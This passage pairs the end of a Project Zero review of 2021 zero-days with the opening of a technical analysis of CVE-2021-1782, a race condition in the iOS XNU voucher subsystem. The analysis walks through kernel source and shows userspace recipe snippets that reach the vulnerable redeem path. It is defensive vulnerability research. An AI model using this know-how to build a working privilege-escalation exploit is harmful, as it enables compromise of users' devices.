Unfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.

As an aside, if you have an exploit sample that you’re willing to share with us, please reach out. Whether it’s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we’d be happy to work with you.

Conclusion

Looking back on 2021, what comes to mind is “baby steps”. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we’re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we’ve seen previously and in components that have previously been discussed as attack surfaces. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, and they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure, that progress has shown us areas where we can continue to improve.

While this all may seem daunting, the promising part is that we’ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits, and two years later more than double that number were detected and disclosed. So while there is still plenty more work to do, it’s a tractable problem. There are concrete steps that the tech and security industries can take to make even more progress:

  1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,
  2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.

Through 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted over and over how governments were using commercial surveillance products against journalists, human rights defenders, and government officials. We saw many enterprises scrambling to remediate and protect themselves from the Exchange Server 0-days. And we even learned of peer security researchers being targeted by North Korean government hackers. While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.

2021 showed us we’re on the right track and making progress, but there’s plenty more to be done to make 0-day hard.

CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

By: Anonymous
14 April 2022 at 15:58

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem work, and for the quirks which led to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

"So iOS 14.4 added locks around this code bit (user_data_get_value() in ipc_voucher.c). "e_made" seems to function as a refcount, and you should be able to race this with itself and cause some refs to get lost, eventually giving you a double free"

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Kernel. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited. Description: A race condition was addressed with improved locking. CVE-2021-1782: an anonymous researcher. Entry updated May 28, 2021

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.
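A much-simplified model of that dedup step might look like the following. This is illustrative only, with invented names; the real logic lives in ipc_voucher.c and hashes the voucher contents to pick an ivht_bucket chain:

#include <cstddef>
#include <cstdio>
#include <memory>
#include <unordered_map>
#include <vector>

struct VoucherModel {
    std::vector<unsigned> table;  // per-key value indexes
};

// Stand-in for the global ivht_bucket hash table.
static std::unordered_multimap<std::size_t, std::shared_ptr<VoucherModel>> g_bucket;

static std::size_t HashOf(const std::vector<unsigned>& t) {
    std::size_t h = 0;
    for (unsigned v : t) h = h * 31 + v;  // stand-in for the voucher checksum
    return h;
}

// Return the existing voucher with this key/value set if there is one,
// otherwise insert and return a new voucher.
std::shared_ptr<VoucherModel> InternVoucher(std::vector<unsigned> table) {
    std::size_t h = HashOf(table);
    auto range = g_bucket.equal_range(h);
    for (auto it = range.first; it != range.second; ++it)
        if (it->second->table == table)
            return it->second;  // duplicate found: return a reference to it
    auto v = std::make_shared<VoucherModel>();
    v->table = std::move(table);
    g_bucket.emplace(h, v);
    return v;
}

int main() {
    auto a = InternVoucher({1, 2, 3});
    auto b = InternVoucher({1, 2, 3});
    std::printf("deduplicated: %s\n", a == b ? "yes" : "no");  // prints "yes"
}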

Here's the structure of a voucher:

struct ipc_voucher {
  iv_index_t     iv_hash;        /* checksum hash */
  iv_index_t     iv_sum;         /* checksum of values */
  os_refcnt_t    iv_refs;        /* reference count */
  iv_index_t     iv_table_size;  /* size of the voucher table */
  iv_index_t     iv_inline_table[IV_ENTRIES_INLINE];
  iv_entry_t     iv_table;       /* table of voucher attr entries */
  ipc_port_t     iv_port;        /* port representing the voucher */
  queue_chain_t  iv_hash_link;   /* link on hash chain */
};

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)
#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

/* other well-known-keys will be added here */
#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)
#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)
#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)
#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t   ivac_refs;

boolean_t     ivac_is_growing;      /* is the table being grown */

ivac_entry_t  ivac_table;           /* table of voucher attr value entries */

iv_index_t    ivac_table_size;      /* size of the attr value table */

iv_index_t    ivac_init_table_size; /* size of the attr value table */

iv_index_t    ivac_freelist;        /* index of the first free element */

ipc_port_t    ivac_port;            /* port for accessing the cache control  */

lck_spin_t    ivac_lock_data;

iv_index_t    ivac_key_index;       /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

        ipc_voucher_attr_manager_t      ivgte_manager;

        ipc_voucher_attr_control_t      ivgte_control;

        mach_voucher_attr_key_t         ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

  ipc_voucher_attr_manager_release_value_t    ivam_release_value;

  ipc_voucher_attr_manager_get_value_t        ivam_get_value;

  ipc_voucher_attr_manager_extract_content_t  ivam_extract_content;

  ipc_voucher_attr_manager_command_t          ivam_command;

  ipc_voucher_attr_manager_release_t          ivam_release;

  ipc_voucher_attr_manager_flags              ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

  .ivam_release_value =   user_data_release_value,

  .ivam_get_value =       user_data_get_value,

  .ivam_extract_content = user_data_extract_content,

  .ivam_command =         user_data_command,

  .ivam_release =         user_data_release,

  .ivam_flags =           IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t  ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

  iv_value_handle_t ivace_value;

  iv_value_refs_t   ivace_layered:1,   /* layered effective entry */

                    ivace_releasing:1, /* release in progress */

                    ivace_free:1,      /* on freelist */

                    ivace_persist:1,   /* Persist the entry, don't

                                           count made refs */

                    ivace_refs:28;     /* reference count */

  union {

    iv_value_refs_t ivaceu_made;       /* made count (non-layered) */

    iv_index_t      ivaceu_layer;      /* next effective layer

                                          (layered) */

  } ivace_u;

  iv_index_t        ivace_next;        /* hash or freelist */

  iv_index_t        ivace_index;       /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up, in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)
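
To make that concrete, here's a minimal sketch (my own illustration, not XNU code; the struct and function names are hypothetical) of a lookup over an index-chained hash bucket:

#include <stdint.h>

#define IV_HASH_END ((uint32_t)~0u)

struct entry {
    uint64_t value;   /* the deduped value, e.g. an ivace_value */
    uint32_t next;    /* index of the next entry in this hash chain */
};

/* Walk one bucket's chain; returns the matching index or IV_HASH_END.
 * Because links are table indexes, the chain survives the table being
 * reallocated (grown), unlike a chain of raw pointers. */
static uint32_t
chain_lookup(struct entry *table, uint32_t head, uint64_t value)
{
    for (uint32_t idx = head; idx != IV_HASH_END; idx = table[idx].next) {
        if (table[idx].value == value) {
            return idx;
        }
    }
    return IV_HASH_END;
}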

Userdata attrs

user_data is one of the four types of supported, implemented voucher attr types. Its only purpose is to manage buffers of arbitrary, user-controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer), the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

  mach_voucher_attr_value_reference_t e_made;

  mach_voucher_attr_content_size_t    e_size;

  iv_index_t                          e_sum;

  iv_index_t                          e_hash;

  queue_chain_t                       e_hash_link;

  uint8_t                             e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element, this structure shouldn't need to be reference counted. There is, however, one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

    mach_voucher_attr_raw_recipe_array_t recipes,

    mach_voucher_attr_recipe_size_t recipesCnt,

    mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

  mach_voucher_attr_key_t            key;

  mach_voucher_attr_recipe_command_t command;

  mach_voucher_name_t                previous_voucher;

  mach_voucher_attr_content_size_t   content_size;

  uint8_t                            content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method, which calls the attr manager's ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at an example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;
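
For completeness, here's a hedged sketch of how this recipe might actually be submitted from userspace via the host_create_mach_voucher MIG method we're about to walk through. The helper name create_udata_voucher is my own and error handling is elided:

#include <mach/mach.h>
#include <stdint.h>

/* uses struct udata_dword_recipe as defined above */
kern_return_t
create_udata_voucher(mach_port_t *voucher_out)
{
  struct udata_dword_recipe r = {0};
  r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
  r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
  r.recipe.content_size = sizeof(uint32_t);
  r.payload = 0x41414141;

  /* recipesCnt is a byte count covering all of the packed sub-recipes */
  return host_create_mach_voucher(mach_host_self(),
                                  (mach_voucher_attr_raw_recipe_array_t)&r,
                                  sizeof(r),
                                  voucher_out);
}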

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

  return KERN_RESOURCE_SHORTAGE;

}

 /* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

  ipc_voucher_t prev_iv;

  if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  /* find the next recipe */

  sub_recipe =

    (mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

  if (recipe_size - recipe_used - sizeof(*sub_recipe) <

      sub_recipe->content_size) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

  /* convert voucher port name (current space) */

  /* into a voucher reference */

  prev_iv =

    convert_port_name_to_voucher(sub_recipe->previous_voucher);

  if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

      IV_NULL == prev_iv) {

    kr = KERN_INVALID_CAPABILITY;

    break;

  }

  kr = ipc_execute_voucher_recipe_command(

         voucher,

         sub_recipe->key,

         sub_recipe->command,

         prev_iv,

         sub_recipe->content,

         sub_recipe->content_size,

         FALSE);

  ipc_voucher_release(prev_iv);

  if (KERN_SUCCESS != kr) {

    break;

  }

}

if (KERN_SUCCESS == kr) {

  *new_voucher = iv_dedup(voucher);

} else {

  *new_voucher = IV_NULL;

  iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

  ipc_voucher_t                      voucher,

  mach_voucher_attr_key_t            key,

  mach_voucher_attr_recipe_command_t command,

  ipc_voucher_t                      prev_iv,

  mach_voucher_attr_content_t        content,

  mach_voucher_attr_content_size_t   content_size,

  boolean_t                          key_priv)

{

  iv_index_t prev_val_index;

  iv_index_t val_index;

  kern_return_t kr;

  switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

        default:

                kr = ipc_replace_voucher_value(voucher,

                    key,

                    command,

                    prev_iv,

                    content,

                    content_size);

                if (KERN_SUCCESS != kr) {

                        return kr;

                }

                break;

        }

        return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

        ipc_voucher_t                           voucher,

        mach_voucher_attr_key_t                 key,

        mach_voucher_attr_recipe_command_t      command,

        ipc_voucher_t                           prev_voucher,

        mach_voucher_attr_content_t             content,

        mach_voucher_attr_content_size_t        content_size)

{

...

        /*

         * Get the manager for this key_index.

         * Returns a reference on the control.

         */

        key_index = iv_key_to_index(key);

        ivgt_lookup(key_index, TRUE, &ivam, &ivac);

        if (IVAM_NULL == ivam) {

                return KERN_INVALID_ARGUMENT;

        }

..

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATTR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

        if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

                return IV_UNUSED_KEYINDEX;

        }

        return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

        /* save the current value stored in the forming voucher */

        save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There are allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)
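
As a concrete (hedged) illustration of that, here's a sketch of a recipe buffer containing two sub-recipes for the same key: a STORE followed by a REDEEM. The REDEEM sub-recipe passes MACH_PORT_NULL as previous_voucher, so, as we're about to see, it operates on the value which the STORE sub-recipe just placed in the voucher under construction. (The packed layout is my assumption about what the parser expects.)

struct store_then_redeem_recipe {
  mach_voucher_attr_recipe_data_t store;   /* consumed first */
  uint32_t payload;                        /* 4 bytes of STORE content */
  mach_voucher_attr_recipe_data_t redeem;  /* consumed second */
};

struct store_then_redeem_recipe r = {0};
r.store.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
r.store.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
r.store.content_size = sizeof(uint32_t);
r.payload = 0x41414141;

r.redeem.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
r.redeem.command = MACH_VOUCHER_ATTR_REDEEM;
r.redeem.previous_voucher = MACH_PORT_NULL; /* refer to the forming voucher */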

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

        if (key_index < iv->iv_table_size) {

                return iv->iv_table[key_index];

        }

        return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

        prev_val_index = (IV_NULL != prev_voucher) ?

            iv_lookup(prev_voucher, key_index) :

            save_val_index;

Then the code looks up the actual previous value to operate on:

        ivace_lookup_values(key_index, prev_val_index,

            previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

        iv_index_t                              key_index,

        iv_index_t                              value_index,

        mach_voucher_attr_value_handle_array_t          values,

        mach_voucher_attr_value_handle_array_size_t     *count)

{

        ipc_voucher_attr_control_t ivac;

        ivac_entry_t ivace;

        if (IV_UNUSED_VALINDEX == value_index ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

                *count = 0;

                return;

        }

        ivac = iv_global_table[key_index].ivgte_control;

        assert(IVAC_NULL != ivac);

        /*

         * Get the entry and then the linked values.

         */

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        /*

         * TODO: support chained values (for effective vouchers).

         */

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

        ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock, then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value from there:

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

        /* Call out to resource manager to get new value */

        new_value_voucher = IV_NULL;

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

        ipc_voucher_attr_manager_t                      __assert_only manager,

        mach_voucher_attr_key_t                         __assert_only key,

        mach_voucher_attr_recipe_command_t              command,

        mach_voucher_attr_value_handle_array_t          prev_values,

        mach_voucher_attr_value_handle_array_size_t     prev_value_count,

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size,

        mach_voucher_attr_value_handle_t                *out_value,

        mach_voucher_attr_value_flags_t                 *out_flags,

        ipc_voucher_t                                   *out_value_voucher)

{

        user_data_element_t elem;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        /* never an out voucher */

        *out_value_voucher = IPC_VOUCHER_NULL;

        *out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

        case MACH_VOUCHER_ATTR_USER_DATA_STORE:

                if (USER_DATA_MAX_DATA < content_size) {

                        return KERN_RESOURCE_SHORTAGE;

                }

                /* empty is the default */

                if (0 == content_size) {

                        *out_value = 0;

                        return KERN_SUCCESS;

                }

                elem = user_data_dedup(content, content_size);

                *out_value = (mach_voucher_attr_value_handle_t)elem;

                return KERN_SUCCESS;

        default:

                /* every other command is unknown */

                return KERN_INVALID_ARGUMENT;

        }

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size)

{

        iv_index_t sum;

        iv_index_t hash;

        user_data_element_t elem;

        user_data_element_t alloc = NULL;

        sum = user_data_checksum(content, content_size);

        hash = USER_DATA_HASH_BUCKET(sum);

retry:

        user_data_lock();

        queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

                assert(elem->e_hash == hash);

                /* if sums match... */

                if (elem->e_sum == sum && elem->e_size == content_size) {

                        iv_index_t i;

                        /* and all data matches */

                        for (i = 0; i < content_size; i++) {

                                if (elem->e_data[i] != content[i]) {

                                        break;

                                }

                        }

                        if (i < content_size) {

                                continue;

                        }

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

                        if (NULL != alloc) {

                                kfree(alloc, sizeof(*alloc) + content_size);

                        }

                        return elem;

                }

        }

        if (NULL == alloc) {

                user_data_unlock();

                alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

                alloc->e_made = 1;

                alloc->e_size = content_size;

                alloc->e_sum = sum;

                alloc->e_hash = hash;

                memcpy(alloc->e_data, content, content_size);

                goto retry;

        }

        queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

        user_data_unlock();

        return alloc;

}

